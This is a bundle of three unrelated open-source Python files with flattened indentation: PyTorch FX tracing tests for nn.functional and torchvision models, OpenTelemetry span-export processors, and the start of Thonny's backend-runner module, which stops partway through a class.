exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
__init__.py
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import typing
from enum import Enum
from opentelemetry.context import Context
from opentelemetry.util import time_ns
from .. import Span, SpanProcessor
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILED_RETRYABLE = 1
FAILED_NOT_RETRYABLE = 2
class SpanExporter:
"""Interface for exporting spans.
Interface to be implemented by services that want to export recorded in
its own format.
To export data this MUST be registered to the :class`opentelemetry.sdk.trace.Tracer` using a
`SimpleExportSpanProcessor` or a `BatchExportSpanProcessor`.
"""
def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `opentelemetry.trace.Span` objects to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleExportSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleExportSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(self, span: Span) -> None:
pass
def on_end(self, span: Span) -> None:
with Context.use(suppress_instrumentation=True):
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span.")
def shutdown(self) -> None:
self.span_exporter.shutdown()
class BatchExportSpanProcessor(SpanProcessor):
"""Batch span processor implementation.
BatchExportSpanProcessor is an implementation of `SpanProcessor` that
batches ended spans and pushes them to the configured `SpanExporter`.
"""
def __init__(
self,
span_exporter: SpanExporter,
max_queue_size: int = 2048,
schedule_delay_millis: float = 5000,
max_export_batch_size: int = 512,
):
if max_queue_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
if max_export_batch_size <= 0:
raise ValueError(
"max_export_batch_size must be a positive integer."
)
if max_export_batch_size > max_queue_size:
raise ValueError(
"max_export_batch_size must be less than and equal to max_export_batch_size."
)
self.span_exporter = span_exporter
self.queue = collections.deque(
[], max_queue_size
) # type: typing.Deque[Span]
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
self.condition = threading.Condition(threading.Lock())
self.schedule_delay_millis = schedule_delay_millis
self.max_export_batch_size = max_export_batch_size
self.max_queue_size = max_queue_size
self.done = False
# flag that indicates that spans are being dropped
self._spans_dropped = False
# precallocated list to send spans to exporter
self.spans_list = [
None
] * self.max_export_batch_size # type: typing.List[typing.Optional[Span]]
self.worker_thread.start()
def on_start(self, span: Span) -> None:
pass
def on_end(self, span: Span) -> None:
if self.done:
logging.warning("Already shutdown, dropping span.")
return
if len(self.queue) == self.max_queue_size:
if not self._spans_dropped:
logging.warning("Queue is full, likely spans will be dropped.")
self._spans_dropped = True
self.queue.appendleft(span)
if len(self.queue) >= self.max_queue_size // 2:
with self.condition:
self.condition.notify()
def worker(self):
timeout = self.schedule_delay_millis / 1e3
while not self.done:
if len(self.queue) < self.max_export_batch_size:
with self.condition:
self.condition.wait(timeout)
if not self.queue:
# spurious notification, let's wait again
continue
if self.done:
# missing spans will be sent when calling flush
break
# substract the duration of this export call to the next timeout
start = time_ns()
self.export()
end = time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
# be sure that all spans are sent
self._flush()
def export(self) -> None:
"""Exports at most max_export_batch_size spans."""
idx = 0
# currently only a single thread acts as consumer, so queue.pop() will
# not raise an exception
while idx < self.max_export_batch_size and self.queue:
self.spans_list[idx] = self.queue.pop()
idx += 1
with Context.use(suppress_instrumentation=True):
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(
self.spans_list[:idx]
) # type: ignore
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span batch.")
# clean up list
for index in range(idx):
self.spans_list[index] = None
def _flush(self):
# export all elements until queue is empty
while self.queue:
self.export()
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
for span in spans:
print(span)
return SpanExportResult.SUCCESS
|
running.py
|
# -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import shlex
import shutil
import signal
import subprocess
import sys
import time
import traceback
from logging import debug
from threading import Thread
from time import sleep
from thonny import (
THONNY_USER_DIR,
common,
get_runner,
get_shell,
get_workbench,
ui_utils,
)
from thonny.code import get_current_breakpoints, get_saved_current_script_filename
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
normpath_with_actual_case,
is_same_path,
parse_message,
path_startswith,
serialize_message,
update_system_path,
)
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from typing import Any, List, Optional, Sequence, Set # @UnusedImport; @UnusedImport
from thonny.terminal import run_in_terminal
from thonny.ui_utils import select_sequence
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: Any
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
self._check_alloc_console()
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
get_workbench().add_command(
"run_current_script",
"run",
"Run current script",
caption="Run",
handler=self._cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self._cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=True,
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
"Run current script in terminal",
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
"Stop/Restart backend",
caption="Stop",
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=70,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
"Interrupt execution",
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence="<Control-c>",
group=70,
bell_when_denied=False,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command"
"""
return self._state
def _set_state(self, state: str) -> None:
if self._state != state:
logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logging.warning(
"RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
)
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
# Offer the command
logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
get_workbench().event_generate("BackendRestart")
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logging.warning(
"Can't pile up too many commands. This command will be just ignored"
)
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logging.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if (
working_directory is not None
and get_workbench().get_cwd() != working_directory
):
# create compound command
# start with %cd
cd_cmd_line = construct_cmd_line(["%cd", working_directory]) + "\n"
next_cwd = working_directory
else:
# create simple command
cd_cmd_line = ""
next_cwd = get_workbench().get_cwd()
# append main command (Run, run, Debug or debug)
rel_filename = os.path.relpath(script_path, next_cwd)
exe_cmd_line = (
construct_cmd_line(["%" + command_name, rel_filename] + args) + "\n"
)
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
def execute_current(
self, command_name: str, always_change_to_script_dir: bool = False
) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(False, False, 2)
filename = get_saved_current_script_filename()
if not filename:
# cancel must have been pushed
return
# changing dir may be required
script_dir = normpath_with_actual_case(os.path.dirname(filename))
if (
get_workbench().get_option("run.auto_cd")
and command_name[0].isupper()
or always_change_to_script_dir
):
working_directory = script_dir # type: Optional[str]
else:
working_directory = None
args = self._get_active_arguments()
self.execute_script(filename, args, working_directory, command_name)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def _cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (
self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self._cmd_run_current_script_enabled()
)
def _cmd_run_current_script(self) -> None:
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
filename = get_saved_current_script_filename()
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
self._proxy.interrupt()
else:
logging.warning("Interrupting without proxy")
def _cmd_interrupt_enabled(self) -> bool:
if not self._proxy or not self._proxy.is_functional():
return False
# TODO: distinguish command and Ctrl+C shortcut
widget = get_workbench().focus_get()
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy
if widget is not None and hasattr(widget, "selection_get"):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
return False
except Exception:
# selection_get() gives error when calling without selection on Ubuntu
pass
# TODO: should it be get_runner().is_waiting_toplevel_command() ??
return True
def cmd_stop_restart(self) -> None:
self.restart_backend(True)
def _poll_vm_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_vm_messages() is False:
return
self._polling_after_id = get_workbench().after(20, self._poll_vm_messages)
def _pull_vm_messages(self):
while self._proxy is not None:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
logging.debug(
"RUNNER GOT: %s, %s in state: %s",
msg.event_type,
msg,
self.get_state(),
)
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
else:
"other messages don't affect the state"
if "cwd" in msg:
get_workbench().set_cwd(msg["cwd"])
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(
class_event_type, event=msg
) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
err = "Backend terminated (returncode: %s)\n" % getattr(exc, "returncode", "?")
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logging.exception("Failed retrieving backend faults")
err = err.strip() + "\nUse 'Stop/Restart' to restart the backend ...\n"
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data=err)
get_workbench().become_active_window()
def restart_backend(
self, clean: bool, first: bool = False, wait: float = 0
) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_vm_messages()
if wait:
start_time = time.time()
while (
not self.is_waiting_toplevel_command()
and time.time() - start_time <= wait
):
# self._pull_vm_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart")
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("thonny.exe") or sys.executable.endswith(
"pythonw.exe"
):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("thonny.exe", "python.exe").replace(
"pythonw.exe", "python.exe"
)
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logging.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
# Without flush the console window becomes visible, but Thonny can be still used
logging.getLogger("thonny").exception(
"Problem with finalizing console allocation"
)
def can_do_file_operations(self):
return self._proxy and self._proxy.can_do_file_operations()
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def has_separate_files(self):
if self._proxy is None:
return False
else:
return self._proxy.has_separate_files()
def get_node_label(self):
if self._proxy is None:
return "Back-end"
else:
return self._proxy.get_node_label()
def using_venv(self) -> bool:
return isinstance(self._proxy, CPythonProxy) and self._proxy.in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
return getattr(self, method_name)(cmd)
else:
logging.getLogger("thonny").warn("Discarding %s", cmd)
return "discard"
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def interrupt(self):
"""Tries to interrupt current command without reseting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_functional(self):
"""Used in MicroPython proxies"""
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
def get_node_label(self):
"""Used as files caption if back-end has separate files"""
return "Back-end"
def has_separate_files(self):
return False
def can_do_file_operations(self):
return False
class CPythonProxy(BackendProxy):
"abstract class"
def __init__(self, executable):
super().__init__(True)
self._executable = executable
self._proc = None
self._message_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self.in_venv = None
self._start_new_process()
def fetch_next_message(self):
if not self._message_queue or len(self._message_queue) == 0:
if self._proc is not None:
retcode = self._proc.poll()
if retcode is not None:
raise BackendTerminatedError(retcode)
return None
msg = self._message_queue.popleft()
self._store_state_info(msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
while True:
if len(self._message_queue) == 0:
return msg
else:
next_msg = self._message_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and len(msg["data"]) + len(next_msg["data"])
<= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
):
msg["data"] += next_msg["data"]
else:
# not same type of message, put it back
self._message_queue.appendleft(next_msg)
return msg
else:
return msg
def _store_state_info(self, msg):
if "gui_is_active" in msg:
self._update_gui_updating(msg)
if "in_venv" in msg:
self.in_venv = msg["in_venv"]
if "path" in msg:
self._sys_path = msg["path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
def send_command(self, cmd):
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._close_backend()
self._start_new_process(cmd)
self._send_msg(cmd)
def _send_msg(self, msg):
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def get_sys_path(self):
return self._sys_path
def interrupt(self):
if self._proc is not None and self._proc.poll() is None:
if running_on_windows():
try:
os.kill(
self._proc.pid, signal.CTRL_BREAK_EVENT
) # @UndefinedVariable
except Exception:
logging.exception("Could not interrupt backend process")
else:
self._proc.send_signal(signal.SIGINT)
def destroy(self):
self._close_backend()
def _close_backend(self):
self._cancel_gui_update_loop()
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._message_queue = None
def _start_new_process(self, cmd=None):
# deque, because in one occasion I need to put messages back
self._message_queue = collections.deque()
# prepare environment
my_env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
my_env["PYTHONIOENCODING"] = "utf-8"
# Let back-end know about plug-ins
my_env["THONNY_USER_DIR"] = THONNY_USER_DIR
if get_workbench().in_debug_mode():
my_env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in my_env:
del my_env["THONNY_DEBUG"]
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
import thonny.backend_launcher
cmd_line = [
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
thonny.backend_launcher.__file__,
]
if hasattr(cmd, "filename"):
cmd_line.append(cmd.filename)
if hasattr(cmd, "args"):
cmd_line.extend(cmd.args)
if hasattr(cmd, "environment"):
my_env.update(cmd.environment)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_cwd())
self._proc = subprocess.Popen(
cmd_line,
# bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=get_workbench().get_cwd(),
env=my_env,
universal_newlines=True,
creationflags=creationflags,
)
# send init message
self._send_msg({"frontend_sys_path": sys.path})
if cmd:
# Consume the ready message, cmd will get its own result message
ready_line = self._proc.stdout.readline()
if ready_line == "": # There was some problem
error_msg = self._proc.stderr.read()
raise Exception("Error starting backend process: " + error_msg)
self._store_state_info(parse_message(ready_line))
# setup asynchronous output listeners
Thread(target=self._listen_stdout, daemon=True).start()
Thread(target=self._listen_stderr, daemon=True).start()
def _listen_stdout(self):
# debug("... started listening to stdout")
# will be called from separate thread
message_queue = self._message_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
message_queue.append(msg)
while len(message_queue) > 100:
# Probably backend runs an infinite/long print loop.
# Throttle message thougput in order to keep GUI thread responsive.
sleep(0.1)
while self._proc is not None:
data = self._proc.stdout.readline()
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
traceback.print_exc()
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent(
"ProgramOutput", data=parts[0], stream_name="stdout"
)
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput",
data=second_part,
stream_name="stdout",
)
)
def _listen_stderr(self):
# stderr is used only for debugger debugging
while True:
data = self._proc.stderr.readline()
if data == "":
break
else:
self._message_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
def get_local_executable(self):
return self._executable
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_exe_dirs(self):
return self._exe_dirs
def _update_gui_updating(self, msg):
"""Enables running Tkinter or Qt programs which doesn't call mainloop.
When mainloop is omitted, then program can be interacted with
from the shell after it runs to the end.
Each ToplevelResponse is supposed to tell, whether gui is active
and needs updating.
"""
if not "gui_is_active" in msg:
return
if msg["gui_is_active"] and self._gui_update_loop_id is None:
# Start updating
self._loop_gui_update(True)
elif not msg["gui_is_active"] and self._gui_update_loop_id is not None:
self._cancel_gui_update_loop()
def _loop_gui_update(self, force=False):
if force or get_runner().is_waiting_toplevel_command():
self.send_command(InlineCommand("process_gui_events"))
self._gui_update_loop_id = get_workbench().after(50, self._loop_gui_update)
def _cancel_gui_update_loop(self):
if self._gui_update_loop_id is not None:
try:
get_workbench().after_cancel(self._gui_update_loop_id)
finally:
self._gui_update_loop_id = None
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
cmd = [self._executable]
if interactive:
cmd.append("-i")
cmd.append(os.path.basename(script_path))
cmd.extend(args)
run_in_terminal(cmd, os.path.dirname(script_path), keep_open=keep_open)
def get_supported_features(self):
return {"run", "debug", "run_in_terminal", "pip_gui", "system_shell"}
class PrivateVenvCPythonProxy(CPythonProxy):
def __init__(self, clean):
self._prepare_private_venv()
